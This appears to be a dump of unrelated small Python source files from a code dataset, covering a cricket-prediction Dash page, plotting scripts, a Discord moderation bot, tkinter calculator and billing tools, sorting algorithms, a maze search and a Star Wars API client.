split the data into a training set, a validation set and a test set. For the training set I used the year 2014-2017,\n            for the validation set I used the year 2018 and for the test set I used 2019. My target in this data is the 'Result' column\n            which contains the value 'Won' or 'Lost'. I used my training set to find a baseline. \n            Lost    0.548154  \n            Won     0.451846  \n            \n            The majority class is the value 'Lost' and gives me a baseline accuracy of 0.548154.\n\n            I used Logistic Regression, XGBoost, Decision Tree and Random Forests with Ordinal encoding and \n            OneHotEncoding to see which model could give me the most accurate predictions. OneHotEncoding gave me\n            significantly higher scores so that is what I used to continue.\n            I ended up with the following scores:\n\n\n\n            \"\"\"\n        ),\n        html.Img(src='assets/accScores.PNG', width=\"35%\", height=\"35%\", \n\t\t\t\t className='img-fluid'),\n        dcc.Markdown(\n            \"\"\"\n            \n            Decision tree and Random forests had the best scores and were significantly above the baseline, but they \n            were very close to each other. I decided to get the Permutation Importances to see if isolating the more important features \n            might help me obtain a better score.\n\n\n            \"\"\"\n        ),\n        html.Img(src='assets/permutation.PNG', width=\"20%\", height=\"20%\", \n\t\t\t\t className='img-fluid'),\n        dcc.Markdown(\n            \"\"\"\n            \n            I tried my model a few more times using the best features from the permutation importances but\n            always ended up with a much lower score.\n            Since Decision tree and Random Forests had scores that were so close to each other, I decided to investigate \n            further to see which one had the more accurate model. 
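One straightforward way to make that comparison concrete is scikit-learn's `confusion_matrix(y_test, model.predict(X_test))`, assuming each fitted model is available as `model`. 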
I used the test data for each to plot a confusion matrix.\n            The Decision tree is on the left and the Random forests is on the right.\n\n\n            \"\"\"\n        ),\n        html.Img(src='https://raw.githubusercontent.com/alfaroqueIslam/cricket-match-results/master/assets/treeMatrix.PNG', width=\"25%\", height=\"25%\", \n\t\t\t\t className='img-fluid'),\n        html.Img(src='https://raw.githubusercontent.com/alfaroqueIslam/cricket-match-results/master/assets/forestMatrix.PNG', width=\"25%\", height=\"25%\", \n\t\t\t\t className='img-fluid'),\n        dcc.Markdown(\n            \"\"\"\n            \n            The two models still had very similar figures, so I decided to get the ROC AUC score and plot the ROC curve to make\n            a more definitive comparison.\n\n\n            \"\"\"\n        ),\n        html.Img(src='https://raw.githubusercontent.com/alfaroqueIslam/cricket-match-results/master/assets/rocScores.PNG', width=\"35%\", height=\"35%\", \n\t\t\t\t className='img-fluid'),\n        html.Img(src='https://raw.githubusercontent.com/alfaroqueIslam/cricket-match-results/master/assets/rocCurve.PNG', width=\"40%\", height=\"40%\", \n\t\t\t\t className='img-fluid'),\n        dcc.Markdown(\n            \"\"\"\n            \n            Finally, with an ROC AUC score of almost 0.84, I concluded that my Random forests model was my most accurate model.\n            I used the predictions from this model to create my predictions page, which shows the actual and predicted\n            win rate of T20I teams side by side.\n\n\n            \"\"\"\n        ),\n\n    ],\n)\n\nlayout = dbc.Row([column1])","repo_name":"alfaroqueIslam/cricket-match-results","sub_path":"pages/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":4356,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28570504549","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\n\n\ndef process(in_file):\n\n\tanno_len = []\n\tanno_ex = []\n\tnovel_len = []\n\tnovel_ex = []\n\n\twith open(in_file, 'r') as df:\n\t\tline = True\n\t\twhile line:\n\t\t\tline = df.readline()\n\t\t\titems = line.split('\\t')\n\t\t\tloc = items[0]\n\t\t\ttry:\n\t\t\t\ttrans_len = int(items[4]) - int(items[3])\n\t\t\t\ttrans_ex = (len(items) - 5) / 2\n\t\t\texcept IndexError:\n\t\t\t\tcontinue\n\n\t\t\tif loc == 'annotated':\n\t\t\t\tanno_len.append(trans_len)\n\t\t\t\tanno_ex.append(trans_ex)\n\t\t\telse:\n\t\t\t\tnovel_len.append(trans_len)\n\t\t\t\tnovel_ex.append(trans_ex)\n\n\treturn [anno_len, anno_ex, novel_len, novel_ex]\n\nuniq_ngs = process('D:\\\\MCGDYY\\\\ont_project\\\\ont_vs_ngs\\\\assem\\\\st_sclp.txt')\nuniq_ont = process('D:\\\\MCGDYY\\\\ont_project\\\\ont_vs_ngs\\\\assem\\\\st_sclp.txt')\nngs_ont = process('D:\\\\MCGDYY\\\\ont_project\\\\ont_vs_ngs\\\\assem\\\\st_sclp.txt')\n\n\"\"\"\n1\tuniq_ont_len\t2\tuniq_ont_ex\n\n3\tintersec_len\t4\tintersec_ex\n\n5\tuniq_ngs_len\t6\tuniq_ngs_ex\n\n\"\"\"\nfig, axes = plt.subplots(3, 2, sharex = 'col', sharey = 'row')\n\n# 1\nsns.kdeplot(ax = axes[0, 0], data = np.log10(uniq_ont[0]), shade = True, color = \"b\")\nsns.kdeplot(ax = axes[0, 0], data = np.log10(uniq_ont[2]), shade = True, color = \"r\")\n\n# 2\nsns.kdeplot(ax = axes[0, 1], data = np.log10(uniq_ont[1]), shade = True, color = \"b\")\nsns.kdeplot(ax = axes[0, 1], data = np.log10(uniq_ont[3]), shade = True, color = \"r\")\n\n# 3\nsns.kdeplot(ax = axes[1, 0], data = np.log10(ngs_ont[0]), shade = True, color = \"b\")\nsns.kdeplot(ax = axes[1, 0], data = np.log10(ngs_ont[2]), shade = True, color = \"r\")\n\n# 4\nsns.kdeplot(ax = axes[1, 1], data = np.log10(ngs_ont[1]), shade = True, color = \"b\")\nsns.kdeplot(ax = axes[1, 1], 
data = np.log10(ngs_ont[3]), shade = True, color = \"r\")\n\n# 5\nsns.kdeplot(ax = axes[2, 0], data = np.log10(uniq_ngs[0]), shade = True, color = \"b\")\nsns.kdeplot(ax = axes[2, 0], data = np.log10(uniq_ngs[2]), shade = True, color = \"r\")\n\n# 6\nsns.kdeplot(ax = axes[2, 1], data = np.log10(uniq_ngs[1]), shade = True, color = \"b\")\nsns.kdeplot(ax = axes[2, 1], data = np.log10(uniq_ngs[3]), shade = True, color = \"r\")\n\naxes[1, 0].set_ylabel('Density')\naxes[2, 0].set_xlabel('Log10(transcript length in bp)')\naxes[2, 1].set_xlabel('Exon number')\n\nplt.show()","repo_name":"indigoblueraspberry/ONT_RNAseq_project","sub_path":"ont_vs_ngs/plot_ngs_ont_trans_len_ex.py","file_name":"plot_ngs_ont_trans_len_ex.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19239908821","text":"# def add(a,b):\n#     c = a + b\n#     return c\n#\n# def add1(d,f=3):\n#     g = d + f\n#     print(g)\n#\n# add1(add(1,2)) # pass the return value of add as the argument of add1\n\n\nDONGWU = []\n\ndef add_Dongwu(dw):\n    DONGWU.append(dw)\n    print(DONGWU)\n\nadd_Dongwu(\"cat\")","repo_name":"yan0728/xuelei","sub_path":"study/函数.py","file_name":"函数.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12384223094","text":"import discord\nimport traceback\nimport sys\nfrom discord.ext import commands\n\n\nclass Example(commands.Cog):\n\n    def __init__(self, bot):\n        self.bot = bot\n\n    # Events\n    @commands.Cog.listener()\n    async def on_ready(self):\n        print('CMDS has connected to Bot!')\n\n    # Commands\n    @commands.command()\n    async def ping(self, ctx):\n        await ctx.send('Pong!')\n\n    @commands.command(aliases=['c'])\n    @commands.has_permissions(manage_messages=True)\n    async def clear(self, ctx, amount: int):\n        try:\n            await ctx.channel.purge(limit=amount)\n        except:\n            await ctx.channel.purge(limit=2)\n\n    @commands.command(aliases=['k'])\n    @commands.has_permissions(kick_members=True)\n    async def kick(self, ctx, member: discord.Member, *, reason=\"No reason provided\"):\n        await ctx.send(F\"{member.name} has been kicked from the Server, Because: {reason}\")\n        await member.kick(reason=reason)\n\n    @commands.command(aliases=['b'])\n    @commands.has_permissions(ban_members=True)\n    async def ban(self, ctx, member: discord.Member, *, reason=\"No reason provided\"):\n        await ctx.send(F\"{member.name} has been banned from the Server, Because: {reason}\")\n        await member.ban(reason=reason)\n\n\ndef setup(bot):\n    bot.add_cog(Example(bot))\n","repo_name":"awkwardfault/bot-not-working","sub_path":"cogs/cmds.py","file_name":"cmds.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74928693904","text":"# ==============================================\r\n# * * Question : Simple Calculator (Gui - File)\r\n# * * Author   : Alhasan Gamal Mahmoud\r\n# * * Date     : 24 - 12 - 2021\r\n# ===============================================\r\n# * Import Every thing from tkinter\r\nfrom tkinter import *\r\n# * globally declare the expression variable\r\n\r\nexp = \"\"\r\n\r\n# * Function to Update the exp in Text Entry Box\r\n\r\n\r\ndef pres(num):\r\n    global exp\r\n\r\n    # * String Concatenation\r\n\r\n    exp += str(num)\r\n\r\n    # * Update the expression\r\n\r\n    equation.set(exp)\r\n\r\n# * Evaluate the final expression\r\n\r\n\r\ndef equalpress():\r\n    try:\r\n        global exp\r\n\r\n        # * Write Expression in 
file\r\n\r\n        file.write(exp)\r\n\r\n        # * using eval function to calculate expression\r\n\r\n        total = str(eval(exp))\r\n        equation.set(total)\r\n\r\n        # * Write = total and make new line in file\r\n\r\n        file.write(\" = \")\r\n        file.write(total)\r\n        file.write(\"\\n\")\r\n\r\n        # * add the total to the expression and continue the equation\r\n\r\n        exp = total\r\n    except:\r\n        equation.set(\" Error \")\r\n        file.write(\" = \")\r\n        file.write(\"Error!\")\r\n        file.write(\"\\n\")\r\n        exp = \"\"\r\n\r\n# * Clearing the Contents of the Calculator\r\n\r\n\r\ndef clear():\r\n    global exp\r\n    exp = \"\"\r\n    equation.set(exp)\r\n\r\n# * BackSpace Element of Equation\r\n\r\n\r\ndef backspace():\r\n    global exp\r\n    exp = exp[:-1]\r\n    equation.set(exp)\r\n\r\n\r\n# * Create a GUI\r\nif __name__ == '__main__':\r\n    window = Tk()\r\n\r\n    # * Create the file and append to it\r\n\r\n    file = open(\"Calculator.txt\", \"a\")\r\n\r\n    # * Set Background Color\r\n\r\n    window.config(background=\"gray\")\r\n\r\n    # * Set Title\r\n\r\n    window.title(\"Simple Calculator\")\r\n\r\n    # * Set the size of window\r\n\r\n    window.geometry(\"390x340\")\r\n\r\n    equation = StringVar()\r\n\r\n    # * Function for Creating the EntryBox for Typing the Text for Operation\r\n\r\n    exp_field = Entry(window, textvariable=equation, font=\"lucida 12 bold\")\r\n\r\n    # * Using the Grid Method for Assigning the Widgets at their respective positions.\r\n\r\n    exp_field.grid(columnspan=4, ipadx=102, ipady=32)\r\n\r\n    # * create the Buttons and position them inside the window.\r\n\r\n    bton1 = Button(window, text=' 1 ', font=\"lucida 15 bold\", fg=\"gray\",\r\n                   bg=\"white\", command=lambda: pres(1), height=1, width=7)\r\n    bton1.grid(row=2, column=0)\r\n\r\n    bton2 = Button(window, text=' 2 ', font=\"lucida 15 bold\", fg=\"gray\",\r\n                   bg=\"white\", command=lambda: pres(2), height=1, width=7)\r\n    bton2.grid(row=2, column=1)\r\n\r\n    bton3 = Button(window, text=' 3 ', font=\"lucida 15 bold\", fg=\"gray\",\r\n                   bg=\"white\", command=lambda: pres(3), height=1, width=7)\r\n    bton3.grid(row=2, column=2)\r\n\r\n    bton4 = Button(window, text=' 4 ', font=\"lucida 15 bold\", fg=\"gray\",\r\n                   bg=\"white\", command=lambda: pres(4), height=1, width=7)\r\n    bton4.grid(row=3, column=0)\r\n\r\n    bton5 = Button(window, text=' 5 ', font=\"lucida 15 bold\", fg=\"gray\",\r\n                   bg=\"white\", command=lambda: pres(5), height=1, width=7)\r\n    bton5.grid(row=3, column=1)\r\n\r\n    bton6 = Button(window, text=' 6 ', font=\"lucida 15 bold\", fg=\"gray\",\r\n                   bg=\"white\", command=lambda: pres(6), height=1, width=7)\r\n    bton6.grid(row=3, column=2)\r\n\r\n    bton7 = Button(window, text=' 7 ', font=\"lucida 15 bold\", fg=\"gray\",\r\n                   bg=\"white\", command=lambda: pres(7), height=1, width=7)\r\n    bton7.grid(row=4, column=0)\r\n\r\n    bton8 = Button(window, text=' 8 ', font=\"lucida 15 bold\", fg=\"gray\",\r\n                   bg=\"white\", command=lambda: pres(8), height=1, width=7)\r\n    bton8.grid(row=4, column=1)\r\n\r\n    bton9 = Button(window, text=' 9 ', font=\"lucida 15 bold\", fg=\"gray\",\r\n                   bg=\"white\", command=lambda: pres(9), height=1, width=7)\r\n    bton9.grid(row=4, column=2)\r\n\r\n    bton0 = Button(window, text=' 0 ', font=\"lucida 15 bold\", fg=\"gray\",\r\n                   bg=\"white\", command=lambda: pres(0), height=1, width=7)\r\n    bton0.grid(row=5, column=0)\r\n\r\n    bton_plus = Button(window, text=' + ', font=\"lucida 15 bold\", fg=\"gray\",\r\n                       bg=\"white\", command=lambda: pres(\"+\"), height=1, width=7)\r\n    bton_plus.grid(row=2, column=3)\r\n\r\n    bton_minus = Button(window, text=' - ', font=\"lucida 15 bold\", fg=\"gray\",\r\n                        
bg=\"white\", command=lambda: pres(\"-\"), height=1, width=7)\r\n bton_minus.grid(row=3, column=3)\r\n\r\n bton_multiply = Button(window, text=' * ', font=\"lucida 15 bold\",\r\n fg=\"gray\", bg=\"white\", command=lambda: pres(\"*\"), height=1, width=7)\r\n bton_multiply.grid(row=4, column=3)\r\n\r\n bton_divide = Button(window, text=' / ', font=\"lucida 15 bold\", fg=\"gray\",\r\n bg=\"white\", command=lambda: pres(\"/\"), height=1, width=7)\r\n bton_divide.grid(row=5, column=3)\r\n\r\n bton_equal = Button(window, text=' = ', font=\"lucida 15 bold\",\r\n fg=\"gray\", bg=\"white\", command=equalpress, height=1, width=7)\r\n bton_equal.grid(row=6, column=1)\r\n\r\n bton_power = Button(window, text=' ^ ', font=\"lucida 15 bold\", fg=\"gray\",\r\n bg=\"white\", command=lambda: pres(\"**\"), height=1, width=7)\r\n bton_power.grid(row=5, column=2)\r\n\r\n bton_sqr = Button(window, text=' sqr ', font=\"lucida 15 bold\", fg=\"gray\",\r\n bg=\"white\", command=lambda: pres(\"**0.5\"), height=1, width=7)\r\n bton_sqr.grid(row=6, column=0)\r\n\r\n bton_moduls = Button(window, text=' % ', font=\"lucida 15 bold\", fg=\"gray\",\r\n bg=\"white\", command=lambda: pres(\"%\"), height=1, width=7)\r\n bton_moduls.grid(row=6, column=2)\r\n\r\n bton_int_divid = Button(window, text=' // ', font=\"lucida 15 bold\",\r\n fg=\"gray\", bg=\"white\", command=lambda: pres(\"//\"), height=1, width=7)\r\n bton_int_divid.grid(row=6, column=3)\r\n\r\n bton_decimal = Button(window, text=' . ', font=\"lucida 15 bold\",\r\n fg=\"gray\", bg=\"white\", command=lambda: pres(\".\"), height=1, width=7)\r\n bton_decimal.grid(row=5, column=1)\r\n\r\n bton_clear = Button(window, text=' Clear ', font=\"lucida 15 bold\",\r\n fg=\"gray\", bg=\"white\", command=clear, height=1, width=7)\r\n bton_clear.grid(row=7, column=0)\r\n\r\n backspace = Button(window, text=' Del ', font=\"lucida 15 bold\",\r\n fg=\"gray\", bg=\"white\", command=backspace, height=1, width=7)\r\n backspace.grid(row=7, column=1)\r\n\r\n # * Start GUI\r\n\r\n window.mainloop()\r\n\r\n # * Close File\r\n\r\n file.close()\r\n","repo_name":"alhasangamal/Simple-Calcultor","sub_path":"Calcultor.py","file_name":"Calcultor.py","file_ext":"py","file_size_in_byte":6552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42404171174","text":"from tkinter import Checkbutton, Tk , BOTH,Text,Button,LEFT,RIGHT,S\nfrom tkinter.ttk import Frame,Label\n\nclass Example(Frame):\n def __init__(self,parent):\n Frame.__init__(self,parent, name = \"frame\")\n self.parent = parent\n self.initUi()\n\n def initUi(self):\n self.parent.title(\"Event window\")\n self.pack(fill = BOTH, expand = True) \n\n btn = Button(self, text=\"button\" , command = self.onButton1click)\n btn.pack(side = LEFT, padx = 15)\n\n cBtn = Checkbutton(self, text = \"checkButton\", command = self.onbutton2click)\n cBtn.pack(side = LEFT,anchor=S)\n\n def onbutton2click(self):\n print(\"check button has been clicked\") \n \n def onButton1click(self):\n print(\"push button has been clicked\")\n\n\nclass main():\n root = Tk()\n root.geometry(\"250x150+300+300\")\n app = Example(root)\n root.mainloop()\n\nif __name__ == \"__main__\":\n main()","repo_name":"Ansah-98/tkinter","sub_path":"events/btn.py","file_name":"btn.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6508784346","text":"from contextlib import contextmanager\n\nimport 
pytest\n\n\n@contextmanager\ndef check_for_console_errors(page_context):\n    errors = []\n    page_context.on(\n        \"console\", lambda msg: errors.append(msg.text) if msg.type == \"error\" else None\n    )\n    yield\n    if len(errors) != 0:\n        pytest.fail(f\"Console errors detected {errors}\")\n","repo_name":"DemocracyClub/UK-Polling-Stations","sub_path":"polling_stations/apps/data_finder/tests/playwright/context_managers.py","file_name":"context_managers.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"6421413147","text":"def mergeSort(arr): \n    \n    \"\"\" Runtime \"\"\" \n    # Best Case: O(n log n)\n    # Worst Case: O(n log n)\n\n    if len(arr) <= 1: \n        return arr\n    \n    left_list = mergeSort(arr[0:len(arr)//2])\n    right_list = mergeSort(arr[len(arr)//2: len(arr)])\n\n    return merge(left_list, right_list)\n\ndef merge(list1, list2):\n\n    \"\"\" Runtime \"\"\" \n    # O(n + m)\n\n    sortedlist = [] \n\n    while list1 and list2: \n        if list1[0] < list2[0]: \n            sortedlist.append(list1[0])\n            list1 = list1[1:]\n        else: \n            sortedlist.append(list2[0])\n            list2 = list2[1:]\n    \n    if list1: \n        sortedlist += list1\n\n    if list2: \n        sortedlist += list2\n\n    return sortedlist\n\n\ndef insertionSort(arr):\n    \n    \"\"\" Runtime \"\"\" \n    # Best Case: O(n) (already-sorted input exits the inner loop immediately)\n    # Worst Case: O(n^2)\n\n    for idx in range(1, len(arr)): \n\n        currentindex = idx\n        previousindex = idx - 1\n\n        while previousindex >= 0 and arr[currentindex] < arr[previousindex]: \n            arr[currentindex], arr[previousindex] = arr[previousindex], arr[currentindex]\n            currentindex -= 1\n            previousindex -= 1\n    \n    return arr\n\ndef bubbleSort(arr): \n    \n    \"\"\" Runtime \"\"\" \n    # Best Case: O(n^2)\n    # Worst Case: O(n^2)\n\n    for idx in range(len(arr) - 1): \n        for pos in range(idx + 1, len(arr)): \n            if arr[pos] < arr[idx]: \n                arr[pos], arr[idx] = arr[idx], arr[pos]\n\n    return arr","repo_name":"puzonevan/CafeBan","sub_path":"cafeapp/sorts.py","file_name":"sorts.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39086841806","text":"from collections import deque\nfrom typing import List\n\n\nclass Solution:\n    def nearestExit(self, maze: List[List[str]], entrance: List[int]) -> int:\n        row = len(maze)\n        col = len(maze[0])\n\n        directions = [(0,1), (1,0), (-1,0), (0,-1)]\n\n        def inRange(x,y):\n            return x > -1 and x < len(maze) and y > -1 and y < len(maze[0])\n\n        ent = tuple(entrance)\n        queue = deque()\n        queue.append(ent)\n        visited = {ent}\n        lvl = 0\n        \n        while queue: \n            temp = deque()\n\n            while queue:\n                pos = queue.popleft()\n                visited.add(pos)\n                for direction in directions:\n                    new_row = pos[0] + direction[0]\n                    new_col = pos[1] + direction[1]\n\n                    if inRange((new_row),(new_col)) and maze[new_row][new_col] == \".\" and (new_row,new_col) not in visited:\n                        temp.append(((new_row),(new_col)))\n                        visited.add((new_row,new_col))\n                    if not inRange((new_row),(new_col)) and pos != ent:\n                        return lvl\n                    \n            queue = temp.copy()\n            lvl += 1\n        \n        \n\n        return -1","repo_name":"CodEZ47/A2SV_programming","sub_path":"nearest-exit-from-entrance-in-maze.py","file_name":"nearest-exit-from-entrance-in-maze.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18065847418","text":"\"\"\" Module achieving the task below\n\n# Task 1\n\n    The Star Wars API lists 87 main characters in the Star Wars saga. 
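Each character is addressed by a numeric ID in that range. 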
For the first task, we would\n like you to use a random number generator that picks a number between 1-87. Using these random\n numbers you will be pulling 15 characters from the API using Python.\n\"\"\"\n\nimport json\nimport requests\nfrom random import randrange\nfrom typing import List, Dict\n\nfrom commons.dals import (\n # print_character,\n upsert_characters,\n get_people_film_mapping,\n upsert_films,\n upsert_people_film_rels,\n format_output\n)\nfrom commons.constants import Endpoints\nfrom multiprocessing.pool import ThreadPool\n\n\ndef _randset(start: int = 1, stop: int = 87, limit: int = 15) -> List[int]:\n \"\"\" creates a list of random integers in numerical range(start:stop)\n\n Args:\n start (int): first numeric value in range.\n stop (int): last numeric value in range.\n limit (int): number of results to yield.\n\n Returns:\n List[int]: random values in range(start:stop) with count limited to `limit`.\n \"\"\"\n\n return [randrange(start, stop + 1) for i in range(limit)]\n\n\ndef fetch_all_rel_films(rel_films) -> Dict:\n \"\"\"fetches all people related films as listed in param `rel_films`.\n\n Args:\n rel_films (list): fetches all people-related films as listed.\n\n Returns:\n fetched_films (dict): film objects as received from swapi.\n\n \"\"\"\n\n fetched_films = dict()\n\n for i in rel_films:\n endpoint = Endpoints.FILM.value.format(i)\n data = requests.get(endpoint)\n if data.status_code != 200:\n print(f\"[ ERROR ] problem fetching data for film {i}. Error code - {data.status_code}\"\n f\"\\n...skipping it from result set\")\n continue\n print(f\"\\n-- data has been downloaded from ```{endpoint}``` -- {data.status_code}\")\n fetched_films[endpoint] = data.json()\n return fetched_films\n\n\ndef fetch_all_rel_chars(people_id) -> Dict:\n \"\"\"fetches all characters as listed in param `peopleset`\n\n Args:\n people_id (int): fetches people id\n\n Returns:\n fetched_chars (dict): character objects as received from swapi.\n \"\"\"\n\n fetched_chars = dict()\n\n endpoint = Endpoints.PEOPLE.value.format(people_id)\n data = requests.get(endpoint)\n print(f\"\\n-- data has been downloaded from ```{endpoint}``` -- {data.status_code}\")\n\n if data.status_code == 200:\n fetched_chars[endpoint] = data.json()\n\n return fetched_chars\n\n\ndef resolve_film_deps() -> None:\n \"\"\"Resolves dependencies for all the `character` entities existing in the database and inserts\n values into table `film` and table `CharFilmRelation`.\n\n Returns: None\n\n \"\"\"\n people_film_list = get_people_film_mapping()\n\n people_film_map = {}\n all_rel_films = []\n for bundle in people_film_list:\n films = bundle[\"films\"].split(\" \")\n people_film_map[int(bundle[\"char_id\"])] = [int(film) for film in films]\n all_rel_films.extend(films)\n\n all_rel_films = list(set(all_rel_films))\n fetched_films = fetch_all_rel_films(all_rel_films)\n\n for endpoint_, film_ in fetched_films.items():\n upsert_films(film_, endpoint_)\n\n upsert_people_film_rels(people_film_map)\n\n\nif __name__ == \"__main__\":\n\n # generates list of random ids. Usage ```_randset(start, end, limit)```\n peopleset = _randset(1, 87, 15)\n print(f\"\\n[ NOTE ] LIST OF RANDOM PEOPLE IDs\"\n f\" (as selected by random number generator) :: \\n\\n{peopleset}\\n\")\n\n poolsize_ = 5\n print(f\"\\n[ NOTE ] resolving relationship urls -\\nReal quick!! 
\"\n f\"ThreadPool of {poolsize_} at work.\")\n\n # create a thread-pool, to resolve IO-intensive operation real quick.\n pool = ThreadPool(poolsize_)\n fetched_chars_list = pool.map(fetch_all_rel_chars, peopleset)\n\n # merge all list of dicts into one single dict.\n fetched_chars = {}\n for d in fetched_chars_list:\n fetched_chars.update(d)\n\n # inserts/updates each fetched character into database.\n for endpoint_, char_ in fetched_chars.items():\n upsert_characters(char_, endpoint_)\n\n print(\"\\n\\n[ NOTE ] Pulling films of each character....!!! Another 2 mins, please wait!\")\n\n # gets respective films for each character and stores into relationship table in database.\n resolve_film_deps()\n\n print(f\"\\n\\nHmm!!! We are ready with random 15 people \",\n f\"and all of their respective films in our database!!\"),\n\n while True:\n try:\n people_id = (input(f\"\\n\\nEnter ID of character (aka people id)\\t (any choice to exit)\"\n f\"- \\n[ CHOICES ]\\n {peopleset}\\n\"))\n\n people_id = int(people_id)\n break\n\n except ValueError:\n print(\"[ ERROR ] Please enter numeric value from given choices\")\n continue\n\n # formats result into required format as per task 1\n result = format_output(people_id)\n print(f\"\\n\\nHere is list of films they worked in - \\n\\n\")\n print(json.dumps(result, indent=4, sort_keys=True))\n\n","repo_name":"prashant0493/starwarsAPI","sub_path":"task_one.py","file_name":"task_one.py","file_ext":"py","file_size_in_byte":5083,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"20884034056","text":"#MENSAGEM PESSOAL: armazene o nome de uma pessoa em uma variável e apresente uma mensagem a essa pessoa. Sua mensagem deve ser simples, como \"Alô Eric, você gostaria de aprender um pouco de Python hoje?\"\r\n\r\nfirst_name = \"giullia\"\r\nlast_name = \"pagoto\"\r\nfull_name = first_name + \" \" + last_name\r\n\r\nmessage = \"Hello, \" + full_name.upper() + \"!\" + \"\\nHow are you doing?\" \r\nprint(message)\r\n\r\n#print(\"Languages:\\n\\tPython\\n\\tC\\n\\tJavaScript\")","repo_name":"GiuPagoto/Python","sub_path":"2.3-mensagem_pessoal.py","file_name":"2.3-mensagem_pessoal.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73612256466","text":"import tkinter as tk\r\nfrom tkinter import filedialog\r\nfrom tkinter import messagebox\r\nimport pandas as pd\r\nimport os\r\nimport time\r\nimport openpyxl\r\n\r\n# For testing - set these variables so you won't get prompted\r\nglobal labor_path\r\nglobal materials_path\r\nglobal pay_path\r\nglobal cost_path\r\nlabor_path = 'D:/Development/Evan/E-1-Billing-App/Labor 05 03 20 - 06 05 20.csv'\r\nmaterials_path = 'D:/Development/Evan/E-1-Billing-App/Materials 05 03 20 - 06 05 20.csv'\r\npay_path = 'D:/Development/Evan/E-1-Billing-App/E1 Employee Pay Rates - Sheet1.csv'\r\ncost_path = 'D:/Development/Evan/E-1-Billing-App/E1 Cost Codes - Sheet1.csv'\r\n\r\ndef getLabor ():\r\n global df_l\r\n\r\n if 'labor_path' in globals():\r\n import_file_path = labor_path\r\n else: \r\n import_file_path = filedialog.askopenfilename()\r\n \r\n df_l = pd.read_csv (import_file_path)\r\n\r\n\r\ndef getMaterials ():\r\n global df_m\r\n\r\n if 'materials_path' in globals():\r\n import_file_path = materials_path\r\n else: \r\n import_file_path = filedialog.askopenfilename()\r\n df_m = pd.read_csv (import_file_path)\r\n\r\n\r\ndef getEmployees():\r\n global df_p \r\n \r\n if 
'pay_path' in globals():\r\n import_file_path = pay_path\r\n else: \r\n import_file_path = filedialog.askopenfilename()\r\n df_p = pd.read_csv (import_file_path)\r\n\r\ndef getCost():\r\n global df_c \r\n \r\n if 'cost_path' in globals():\r\n import_file_path = cost_path\r\n else: \r\n import_file_path = filedialog.askopenfilename()\r\n df_c = pd.read_csv (import_file_path)\r\n\r\ndef convertToExcel ():\r\n global read_file\r\n\r\n export_file_path = filedialog.asksaveasfilename(defaultextension='.xlsx')\r\n read_file.to_excel (export_file_path, index = None, header=True)\r\n\r\n#saveAsButton_Excel = tk.Button(text='Convert CSV to Excel', command=convertToExcel, bg='green', fg='white', font=('helvetica', 12, 'bold'))\r\n#canvas1.create_window(150, 180, window=saveAsButton_Excel)\r\n\r\ndef createApplication():\r\n getLabor()\r\n getMaterials()\r\n getCost()\r\n getEmployees()\r\n\r\n global df_l\r\n global df_m\r\n global df_c\r\n global df_p\r\n\r\n MsgBox = tk.messagebox.askquestion ('Create New Billing Folder',\"This will create a new folder with today's date.\",icon = 'warning')\r\n if MsgBox == 'yes':\r\n TodaysDate = time.strftime(\"%m-%d-%Y\")\r\n outdir = filedialog.askdirectory() + '\\\\' + TodaysDate +' Billing Files'\r\n if not os.path.exists(outdir):\r\n os.mkdir(outdir)\r\n\r\n # Drop unwanted columns\r\n df_l = df_l.drop(columns=['payroll_id','fname','lname','number','group','local_day','local_end_time','tz','location'])\r\n\r\n # Split job code and cost code columns into new column sets\r\n new = df_l[\"jobcode\"].str.split(\"-\", n = 1, expand = True)\r\n new2 = df_l['cost code'].str.split('-', n = 1, expand = True)\r\n\r\n df_l['Job No'] = new[1]\r\n df_l['Job Description'] = new[0]\r\n df_l['Cost Code'] = new2[0]\r\n df_l['Cost Code Description'] = new2[1]\r\n\r\n # rename columns/create new columns\r\n df_l = df_l.rename(columns={'local_date': 'Date','hours':'Cost/Hours','username':'Vendor/Employee'})\r\n df_l['Class'] = \"LAB\"\r\n df_l['Cost/Hours'] = pd.to_numeric(df_l['Cost/Hours'],errors='coerce')\r\n df_l['Type'] = \"\"\r\n df_l['Billable'] = \"\"\r\n df_l['Billable'] = pd.to_numeric(df_l['Billable'],errors='coerce')\r\n \r\n # drop residual 'jobcode' column\r\n df_l = df_l.drop(columns=['jobcode'])\r\n\r\n df_lp = pd.merge(df_l,df_p, how = 'left')\r\n\r\n # column schema\r\n df_lp = df_lp[['Job No','Job Description','Cost Code','Cost Code Description','Date','Class','Cost/Hours','Rate','Billable','Vendor/Employee','notes']]\r\n \r\n # multiply data\r\n df_lp['Billable']=df_lp['Rate']*df_lp['Cost/Hours']\r\n\r\n # Create new path w/ date\r\n outname = 'LABOR.csv'\r\n\r\n fullname = os.path.join(outdir, outname)\r\n\r\n df_lp.to_csv(fullname, index=False)\r\n # drop unnecessary 'notes' column\r\n df_lp.drop(columns='notes')\r\n\r\n # Drop unwanted columns\r\n df_m = df_m.drop(columns=['Geographic Area','Phase No','Phase Description','Source','Category','Hours/Units','Quantity','Type'])\r\n\r\n 